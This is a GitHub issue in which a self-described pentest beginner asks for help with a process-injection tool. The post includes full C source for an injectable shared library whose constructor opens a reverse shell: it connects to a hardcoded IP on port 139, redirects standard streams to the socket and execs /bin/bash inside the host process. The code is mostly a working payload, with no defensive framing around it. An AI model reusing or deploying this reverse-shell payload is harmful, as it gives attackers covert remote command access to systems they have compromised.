Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

kill injected process #14

Open
Sharyie opened this issue Jan 7, 2020 · 0 comments
Open

kill injected process #14

Sharyie opened this issue Jan 7, 2020 · 0 comments

Comments

@Sharyie
Copy link

Sharyie commented Jan 7, 2020

hello,thanks for your code.
im a pentest noob,when i test this programmer,i find a issue. i rewrite the sample-library.c to back connect to my host,when i inject the .so to a normal process(like top),inject success and i received a reverse shell,but, the top process disappear,the pid dont change,but the process cmdline changed to /bin/bash,i think sample-library.c cause this.so could you please help me?this is my sample-library.c:

#include <stdio.h>
#include <dlfcn.h>
#include <stdlib.h>
#include <pthread.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

static void * hello()
{
struct sockaddr_in server;
int sock;
char shell[]="/bin/bash";
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
return NULL;
}

server.sin_family = AF_INET;
server.sin_port = htons(139);
server.sin_addr.s_addr = inet_addr("172.16.177.1");
if(connect(sock, (struct sockaddr *)&server, sizeof(struct sockaddr)) == -1) {
    return NULL;
}
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execl(shell,"/bin/bash",(char *)0);
close(sock);
printf("I just got loaded\n");
return NULL;

}

attribute((constructor))
void loadMsg()
{
pthread_t thread_id;
pthread_create(&thread_id,NULL,hello,NULL);
}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant